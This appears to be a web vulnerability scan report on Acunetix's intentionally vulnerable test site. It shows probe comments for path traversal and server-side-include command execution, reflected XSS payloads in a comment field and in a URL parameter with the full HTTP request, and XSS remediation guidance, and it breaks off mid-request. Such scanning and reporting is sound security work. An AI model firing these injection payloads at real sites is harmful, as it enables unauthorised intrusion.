</tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">WEB-INF/web.xml</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">WEB-INF\web.xml</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">/WEB-INF/web.xml</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">\WEB-INF\web.xml</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">thishouldnotexistandhopefullyitwillnot</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com:80/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com/search?q=OWASP%20ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com:80/search?q=OWASP%20ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com:80/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com/search?q=OWASP%20ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com:80/search?q=OWASP%20ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="ls /"--></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="ls /"--><</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="dir \"--></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></div><scrIpt>alert(1);</scRipt><div></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter tbCommentAttack </div><scrIpt>alert(1);</scRipt><div>Evidence </div><scrIpt>alert(1);</scRipt><div>Solution フェーズ: アーキテクチャと設計
同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2
Alert tags Alert description Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
Request Request line and header section (472 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=javascript%3Aalert%281%29%3B&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 Content-Length: 10989 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (10989 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAg